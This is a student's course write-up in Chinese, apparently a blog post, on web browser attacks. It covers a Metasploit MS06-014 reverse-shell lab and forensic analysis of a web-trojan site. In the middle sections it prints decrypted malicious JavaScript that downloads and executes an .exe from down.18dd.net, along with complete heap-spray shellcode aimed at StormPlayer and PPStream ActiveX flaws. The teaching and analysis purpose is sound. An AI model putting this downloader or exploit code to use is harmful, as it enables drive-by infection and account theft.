20199308 2019-2020-2 《网络攻防实践》第12周作业

目录

(:」∠)_

一、实践内容

1、web浏览器的技术发展与安全威胁

  • 现代web浏览器的基本结构

  • web浏览器软件的安全问题与威胁

    • web浏览器软件的安全困境三要素:
      • 复杂性
      • 可扩展性
      • 连通性

  • web浏览安全威胁位置

    • 针对传输网络的网络协议安全威胁
    • 针对web浏览端系统平台的安全威胁
    • 针对web浏览器软件及插件程序的渗透攻击威胁
    • 针对互联网用户的社会工程学攻击威胁

  • web浏览环境及其安全威胁的层次模型

2、web浏览端的渗透攻击威胁——网页木马

2.1 网页木马的机理分析

  • 网页木马的定义特性:网页木马从本质特征上是利用了现代web浏览器软件中所支持的客户端脚本执行能力,针对web浏览端软件安全漏洞实施客户端渗透攻击,从而取得在客户端主机的远程代码执行权限来植入恶意程序。
  • 网页木马的攻击技术流程
  • 网页木马攻击区别于传统的二进制恶意代码的特性:
    • 多样化的客户渗透攻击位置和技术类型
    • 分布式、复杂的微观链接结构
    • 灵活多变的混淆与对抗分析能力
  • 网页木马的本质核心:浏览器渗透攻击
  • 网页挂马机制
    • 1.内嵌HTML标签——最为简单和常见的流量重定向机制:iframe嵌入外部页面链接。
    • 2.恶意Script脚本——利用script标签通过跨站脚本包含网页木马。
    • 3.内嵌对象链接——用第三方应用软件或浏览器帮助对象(BHO)的内嵌对象。
    • 4.ARP欺骗挂马——在同一网段内进行中间人攻击。

2.2 网页木马的检测与分析技术

  • 基于特征码匹配的传统检测方法,提取样本特异性的特征码。
  • 基于统计与机器学习的静态分析方法。
  • 基于动态行为结果判定的检测分析方法,采用蜜罐的形式。
  • 基于模拟浏览器环境的动态分析检测方法,基于模拟浏览器来分析网页木马。

2.3 网页木马防范措施
提升操作系统与浏览器平台软件的安全性

  • 系统在线更新,第三方软件应用更新机制
  • 安装与实时更新反病毒软件
  • 养成安全上网浏览的好习惯
  • 借助于Google安全浏览、siteadvisor等站点安全评估工具

3、揭开网络钓鱼的黑幕

  • 网络钓鱼:社会工程学在互联网中广泛实施的一种典型攻击方式,意图印有收信人给出个人敏感信息。

  • 技术内幕

  • 钓鱼攻击的具体技术与策略:

    • 首先,架设支撑钓鱼攻击的底层基础设施:隐藏自己,寻找潜在的存有漏洞的主机,攻陷缺乏安全防护的服务器或主机;

    • 然后,架设钓鱼网站:假冒各种知名金融机构和在线电子商务网站的前台假冒钓鱼网站,后台收集敏感信息,使用HTML界面编辑工具可以构建出模仿目标组织机构的网站页面,在集中服务器上存放这些假冒钓鱼网站的构建内容及脚本,在攻陷一台服务器之后,通过执行少数几个命令,就可以很快的完成钓鱼网站部署;

    • 构建完毕钓鱼网站后,欺骗互联网用户访问钓鱼网站。

      • 技术层:DNS中毒攻击;Pharming网络流量重定向
      • 常见的:各种自动化的社会工程学手段构造欺骗性垃圾邮件或者信息。具体的欺骗技巧包括:
        使用IP地址代替域名。
        注册发音相近或形似DNS域名。
        多数真实的链接中混杂关键的指向假冒钓鱼网站的链接。
        对链接URL进行编码和混淆。
        攻击浏览器,隐藏消息内容的本质。
        假冒钓鱼网站的透明性。
        恶意软件安装浏览器助手工具。
        修改本地DNS域名和IP地址映射hosts文件。

  • 网络钓鱼攻击的防范

    • 针对网络钓鱼过程中的电子邮件和即时通信信息欺骗,应该提高警惕性;
    • 充分利用浏览器软件、网络安全厂商软件所提供的反钓鱼网站功能特性;
    • 在登录网上银行、证券基金等关键网站进行在线金融操作时,重视访问网站的真实性;
    • 学习和修炼提升自己抵抗社会工程学攻击的能力。

二、实践任务

1、动手实践——web浏览器渗透攻击实验

1.1 任务内容

  • 使用攻击机和靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。

  • 环境:攻击机:Kali、靶机:Windows靶机。

  • 步骤:

    • 选择使用Metasploit中的MS06-014渗透攻击模块。
    • 选择PAYLOAD为任意远程Shell连接。
    • 设置LHOST参数,运行exploit,构造出恶意网页脚本。
    • 在靶机环境中启动浏览器,访问恶意网页脚本URL。
    • 查看建立起的远程控制会话SESSION。

1.2 实践过程

  • 攻击机:kali:192.168.200.2
  • 靶机:win2kserver:192.168.200.10
  • 首先用msfconsole打开metasploit:
  • 搜ms06-014,选择漏洞,设置靶机和攻击机的地址:

  • 选择payload为50号载荷 windows/meterpreter/reverse_tcp,运行run
  • 得到一个Local IP:http://192.168.200.2:8080/vkcAM7luH4,就是题中所说的恶意网页脚本了,用靶机浏览器访问它:
  • 浏览器返回一串字符,回到kali查看,发现已经建立起了一个会话,攻击成功:
  • 最后使用sessions -i 2 打开会话,失败;改用sessions -i 1打开,成功,执行指令,成功建立session会话。
  • 实践1完成。

2、课外实践作业——取证分析实践:剖析一个实际的网页木马攻击场景

2.1 任务内容

  • 根据给出的说明逐步分析,得到最终的木马文件的内容。

  • 说明:这个挂马网站现在已经无法访问了,但蜜网课题组的成员保留了最初做分析时所有的原始文 件。首先你应该访问 start.html,在这个文件中给出了 new09.htm 的地址,在进入 new09.htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed/目录下去下载对应的文件(注意:文件名中的英文字母 为小写, 且没有扩展名),即为解密出的地址对应的文件。如果解密出的地址给出的是网页或脚本文件,请继续解密。如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。 重复以上过程直到这些文件被全部分析完成。请注意:被散列的文件地址应该是标准的 URL 形式,形如 http://xx.18dd.net/a/b.htm,否则会导致散列值计算不正确而无法继续。

  • 问题:

    • 试述你是如何一步步地从所给的网页中获取最后的真实代码的?
    • 网页和 JavaScript 代码中都使用了什么样的加密方法?你是如何解密的?
    • 从解密后的结果来看,攻击者利用了那些系统漏洞?
    • 解密后发现了多少个可执行文件?其作用是什么?这些可执行文件中有下载器么?如果有,它们下载了哪些程序?这些程序又是什么作用的?

2.2 实践过程

  • 完全搞不懂,那个start.html 和 new09.htm要怎么打开呢?

  • 指导书的分析都看的云里雾里,如果让我自己摸索怕是永远都摸不到。。。

  • 由于网站无法访问,根据资料,应该先访问start.html,在引用 new09.htm 没有写绝对路径,所以 new09.htm 文件与 start.html 文件在同一目录下。 new09.htm中,用 iframe 引用了一个http://aa.18dd.net/aa/kl.htm, 又用 javascript 引用了一个http://js.users.51.la/1299644.js 。

  • 分别求这两个的MD5散列值:

  • 在hashed文件夹中找到这两个文件,打开查看:

  • 在第一个文件中,由倒数第三行t=utf8to16(xxtea_decrypt(base64decode(t), 'x73x63x72x69x70x74'));我们知道这个文件使用了一种被称为 XXTEA+Base64 的加密方法,对付这种加密方法,我们只要找到它的加密密钥即可。当然这个xxtea_decrypt函数的第二个参数就是密钥,不过也是被加密过的,但是一种16进制加密。转换一下即可得到密钥

  • 可以看到密钥为script,指导书中所给的 xxtea 在线解密网站已经不能用了,这里可以用xxtea在线解密网站来解密,输入密文和密钥,点击解密,即可得到结果

  • 分析解密结果,需要用16进制解密

  • 分析这段代码,可以看到它利用了应用程序漏洞有“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分别对应利用了微软数据库访问对象、暴风影音、PPStream 和百度搜霸的漏洞。

  • 另外,这个文件还引用三个 js 文件和一个压缩包(bd.cab,解开后是bd.exe),根据分析结果,对http://aa.18dd.net/aa/1.js、http://aa.18dd.net/aa/b.js、http://aa.18dd.net/aa/pps.js和http://down.18dd.net/bb/bd.cab 作处理同样计算md5的值,过程同上,可以分别得到它们的MD5值

  • 首先来看1.js也就是 5d7e9058a857aa2abee820d5473c5fa4,还是一个十六进制加密,解开:

var url="http://down.18dd.net/bb/014.exe";try{var xml=ado.CreateObject("Microsoft.XMLHTTP","");xml.Open

("GET",url,0);xml.Send();as.type=1;as.open();as.write(xml.responseBody);path="..\ntuser.com";as.savetofile(path,2);as.close

();var shell=ado.createobject("Shell.Application","");shell.ShellExecute("cmd.exe","/c "+path,"","open",0)}catch(e){}

  • 这个文件前面部分下载了一个http://down.18dd.net/bb/014.exe的可执行文件,后面部分则是对ADODB漏洞的继续利用。

  • 再来看b.js,也就是3870c28cc279d457746b3796a262f166文件

  • 还原得到代码:

var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var shellcode = unescape("%uf3e9%u0000" + "%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" + "%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" + "%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" + "%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef" + "%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" + "%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" + "%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" + "%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" + "%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" + "%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" + "%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" + "%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" + "%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" + "%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" + "%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" + "%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" + "%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" + "%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" + "%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" + "%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" + "%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" + "%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u6662%u652e%u6578%u0000");
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
memory = new Array();
for (x = 0; x < 300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4068) buffer += "x0ax0ax0ax0a";
storm.rawParse(buffer)
  • 看到了shellcode,shellcode一般都不长,而它要实现很多破坏,不可能“事必亲躬”。因此 shellcode 很可能就是下载器。对于一个下载器来说,必不可少的一项内容就是要下载的内容的 URL,URL中必然出现的斜线“/”吧,“/”的十六进制 ASCII 码是2f.
  • 2f比较密集的地方,从第三个2f开始到末尾的内容,补充解密结果是: http://down.18dd.net/bb/bf.exe。又是一个可执行文件。
  • 再看pps.js即5f0b8bf0385314dbe0e5ec95e6abedc2使用八进制加密:
  • 解密后:
/*%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u*/
pps=(document.createElement("object"));
pps.setAttribute("classid","clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458")
var shellcode = unescape("%uf3e9%u0000"+
"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c" +
"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378" +
"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b" +
"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7" +
"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1" +
"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103" +
"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904" +
"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b" +
"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e" +
"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d" +
"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320" +
"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344" +
"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc" +
"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0" +
"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab" +
"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f" +
"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574" +
"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e" +
"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00" +
"%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c" +
"%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54" +
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u642f%u776f%u2e6e%u3831%u6464%u6e2e%u7465%u622f%u2f62%u7070%u2e73%u7865%u0065");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<400; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 500) buffer+="x0ax0ax0ax0a";
pps.Logo = buffer
  • 同样有shellcode,相同的方法得到http://down.18dd.net/bb/pps.exe.
    对前面出现的exe文件进行MD5散列
MD5(http://down.18dd.net/bb/014.exe,32) = ca4e4a1730b0f69a9b94393d9443b979 
MD5(http://down.18dd.net/bb/bf.exe,32) = 268cbd59fbed235f6cf6b41b92b03f8e 
MD5(http://down.18dd.net/bb/pps.exe,32) = ff59b3b8961f502289c1b4df8c37e2a4
  • 查看可执行文件的加壳情况,发现用 Delphi 写的
  • 接下来使用反汇编工具 W32DAsm 反汇编这个程序,首先来看一下字符串
" goto try"
"#32770"
"(T@"
",T@"
".1"
":AutoRun.inf"
":try"
"[AutoRun]
open="
"program filesinternet explorerIEXPLORE.EXE"
"0813"
"3烂怱VQ嬝媠咑u3离&j"
"60000"
"advapi32.dll"
"Alletdel.bat"
"AutoRun.inf"
"Button"
"ChangeServiceConfig2A"
"ChangeServiceConfig2W"
"cmd /c date "
"cmd /c date 1981-01-12"
"del ""
"del %0"
"drivers/klif.sys"
"Error"
"FPUMaskValue"
"http://down.18dd.net/kl/0.exe"
"http://down.18dd.net/kl/1.exe"
"http://down.18dd.net/kl/10.exe"
"http://down.18dd.net/kl/11.exe"
"http://down.18dd.net/kl/12.exe"
"http://down.18dd.net/kl/13.exe"
"http://down.18dd.net/kl/14.exe"
"http://down.18dd.net/kl/15.exe"
"http://down.18dd.net/kl/16.exe"
"http://down.18dd.net/kl/17.exe"
"http://down.18dd.net/kl/18.exe"
"http://down.18dd.net/kl/19.exe"
"http://down.18dd.net/kl/2.exe"
"http://down.18dd.net/kl/3.exe"
"http://down.18dd.net/kl/4.exe"
"http://down.18dd.net/kl/5.exe"
"http://down.18dd.net/kl/6.exe"
"http://down.18dd.net/kl/7.exe"
"http://down.18dd.net/kl/8.exe"
"http://down.18dd.net/kl/9.exe"
"IE 执行保护"
"IEXPLORE.EXE"
"IE执行保护"
"if exist ""
"Kernel32.dll"
"NoDriveTypeAutoRun"
"ntdll.dll"
"QueryServiceConfig2A"
"QueryServiceConfig2W"
"S@"
"serdst.exe"
"shellAutocommand="
"shellexecute="
"SOFTWAREBorlandDelphiRTL"
"SoftwareMicrosoftWindowsCurrentVersionPoli"
"Telephotsgoogle"
"U嬱兡餝VW3繳h訹@"
"U嬱筧"
"U嬱伳�SVW?�"
"ZwUnmapViewOfSection"
"刌@"
"銼@"
"婦$鰼"
"媩$(?"
"燬@"
"擮@"
"确定"
"媆$?搡?婼婥t?燖"
"瑞星卡卡上网安全助手 - IE防漏墙"
"为即插即用设备提供支持"
"圷@"
"允许"
"允许执行"
  • 分析这些字符串:
    • 由字符串" goto try",":try","Alletdel.bat","cmd /c date ","cmd /c date 1981-01-12","del "","del %0","if exist ",猜测这个程序可能生成一个叫"Alletdel.bat"的批处理文件,这个文件中有一个标签叫"try",批处理文件会不断的执行这个标签下一行的命令,命令内容可能是判断文件存在性,更改系统日期,删除某些文件
    • 由":AutoRun.inf","[AutoRun] open=","AutoRun.inf","shellAutocommand=",猜测这个程序可能在磁盘根目录下生成自动运行的文件,以使得用户在不小心时启动程序
    • 由"advapi32.dll","drivers/klif.sys","program filesinternet explorerIEXPLORE.EXE","IE 执行保护","IEXPLORE.EXE","SoftwareMicrosoftWindowsCurrentVersionPoli","Kernel32.dll","SOFTWAREBorlandDelphiRTL","ChangeServiceConfig2A","ChangeServiceConfig2W","QueryServiceConfig2A","QueryServiceConfig2W"等可以猜测程序可能会修改IE、注册表、服务和系统文件
      -由"瑞星卡卡上网安全助手 - IE防漏墙","允许","允许执行",可知这个程序有一定的防系统保护软件的能力,
    • 由20个可执行文件的 URL 猜测程序要下载一大堆木马
    • 由“为即插即用设备提供支持”可知要建立服务
  • 问题1:
  • 问题2:
  • 问题3:

3、课外实践作业——攻防对抗实践:web浏览器渗透攻击攻防对抗

  • 问题4:
    • 解密后发现了4个可执行文件,这四个可执行文件内容相同,都是下载器,下载了20个程序。这些程序的作用是盗取用户的账号。

3.1 任务内容

  • 攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
  • 防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

3.2 实践过程

  • 采用之前ms06-014的攻击,靶机可以右键查看源文件获取攻击页面的源代码
  • 不知道怎么反混淆代码,搜到的方法都没有解析出来。

4、课外实践作业——取证分析挑战实践:web浏览器遭遇攻击

4.1 任务内容

  • 通过分析给的网络记录文件,回答下列问题:
    • 列出在捕获文件中的应用层协议类型,是针对哪个或哪些协议的?
    • 列出IP地址、主机名、域名,猜测攻击场景的环境配置。
    • 列出所有网页页面,其中哪些页面包含了可疑的、恶意的JavaScript 脚本,谁在连接这些页面,目的是什么?
    • 请给出攻击者执行攻击动作的概要描述。
    • 攻击者引入了哪些技巧给你的分析带来了困难,请提供在之前问题中识别的恶意JavaScript 脚本内容,并对它们进行解码或解密。
    • 攻击者的目标是哪个操作系统,哪些应用软件,哪些安全漏洞?如何阻止这些攻击?
    • Shellcode 执行了哪些动作?请列出 Shellcode 的 MD5,并比较它们之间的差异?
    • 在攻击场景中有二进制可执行代码参与吗?目的是什么?

4.2 实践过程

  • 首先apt-get isntall chaoreader安装chaosreader,然后执行chaosreader -r suspicious-time.pcap打开suspicious-time.pcap文件,可以看到结果有HTTP、ICMP、netbios等协议:

  • 然后执行命令搜索有哪些IP地址和域名在进行攻击:

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http: ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http: ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host: ' | sort -u | sed -e 's/Host: //g'`; echo "$srcip --> $dstip = $host"; done | sort -u

  • 这个指令就是选取之前生成的.http.html文件读取,筛选主机并列出来。通过截图可以看到,rapidshare.com.eyu32.ru 对应192.168.56.50,sploitme.com.cn对应192.168.56.50,shop.honeynet.sg对应192.168.56.51。

    • 服务:10.0.2.2, 10.0.3.2, 10.0.4.2, 10.0.5.2 (DHCP 服务和网关),192.168.1.1 (DNS 服务)。
    • 受害者:10.0.2.15, 10.0.3.15, 10.0.4.15,10.0.5.15 。
    • 模拟被侵入主机:192.168.56.50 ( “rapidshare.com.eyu32.ru”)、192.168.56.51 (“shop.honeynet.sg”)。
    • 攻击者:192.168.56.52 ( “sploitme.com.cn”)。

  • 下面就是确定这是安装在什么环境了,按协议排序列出netbios主机名和工作组,发现都是一样,所以应该是配置在虚拟机下面的。

  • 这里有很多HTTP,第一步的时候生成了很多html文件;

  • 通过打开文件session_0006.part_01.html发现了如下界面,这应该是一个钓鱼网站,显然是恶意创建的对应的就是rapidshare.com.eyu32.ru/login.php。那找sploitme.com.cn,404 NotFound了,这个对应文件session_0007.part_02.html。下面找shop.honeynet.sg/catalog/,对应文件session_0032.part_01.html。


  • 攻击动作的概要描述:

    • 攻击者将恶意javascript代码注入指向sploitme.com.cn/?click=X的隐藏iframe。
    • 当访问者查看这些页面时,它们首先被重定向到sploitme.com.cn/fg/show.php?s=X,该页面通过302 FOUND标头重定向到伪造的404页面(请参见数据包63、174、366)。
    • 然后在该页面中,检查用户代理字符串,着陆点和其他参数,并(show.php)发出另一个javascript代码,该代码尝试各种攻击以在受害者的计算机中执行代码。
    • 如果任何漏洞利用成功,则客户端的计算机将下载并执行位于sploitme.com.cn/fg/load.php?e=X的文件。 在我们的案例中,恶意软件访问www.honeynet.org。

  • 有哪些防分析方法:

    • 被黑的网页包含javascript代码,这些javascript代码使用简单的编码和加密进行了混淆,如:
    • 恶意页面伪装成看起来像404页面。
    • 发送给受害者的漏洞利用程序取决于受害者使用的浏览器,这使得确定漏洞利用者变得更加困难。
    • 该漏洞利用程序不允许同一客户端访问两次。 在数据包366中,show.php可能不会尝试两次通过识别IP来利用同一客户端,因此成功访问同一页面将为客户端提供一个干净的404页面。

  • 有哪些漏洞:

    • 首先我们追踪TCP 142号流,可以查看到这是一个针对Windows XP系统的,主要攻击目标是IE浏览器漏洞和含有ActiveX组件漏洞的。然后主要是哪几种漏洞,这个我找了很久没看出来,估计是被加密的,应该要解密之后才能看出来。下面展示的漏洞都是答案给的。
MDAC RDS.Dataspace ActiveX control

AOL IWinAmpActiveX control (AmpX.dll)

DirectShow ActiveX control (msvidctl.dll)

Office Snapshot Viewer ActiveX control

COM Object Instantiation (msdds.dll)

Office Web Components ActiveX control
  • 可以通过修补操作系统和应用程序,进行定期更新以及使用“ ActiveX杀手”或完全使用其他Web浏览器来防止攻击。
  • Shellcode的执行过程:
    • Shellcode获取系统临时文件路径,加载urlmon.dll,从URLhttp://sploitme.com.cn/fg/load.php?e=1检索可执行文件并执行。Shellcode之间的唯一区别是对load.php脚本的请求中的e变量,该变量指定发送恶意软件可执行文件。
  • Shellcode 的 MD5(并不知道怎么提取shellcode)
- MD5 (shellcode.KQwUDT) = 1dacf1fbf175fe5361b8601e40deb7f0
- MD5 (shellcode.XFxxmV) = 41d013ae668ceee5ee4402bcea7933ce
- MD5 (shellcode.epJYL5) = 22bed6879e586f9858deb74f61b54de4
- MD5 (shellcode.xG9cLy) = 9167201943cc4524d5fc59d57af6bca6
  • 在攻击场景中有二进制可执行代码参与吗?目的是什么?
    • 有。攻击使客户端从恶意软件分发网络服务器下载可执行文件并在本地执行。恶意可执行软件这是load.php发送的Win32可执行文件,它通过Internet Explorer加载www.honeynet.org。

三、实验总结

1、会话(session)保持机制
2、some tools:
http://www.360baidu.cn/hex/
http://cycy.sourceforge.net/xxtea/
http://tools.jb51.net/static/code/js_beautify/index.html
3、这次作业很懵圈

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/hsj910/p/12897349.html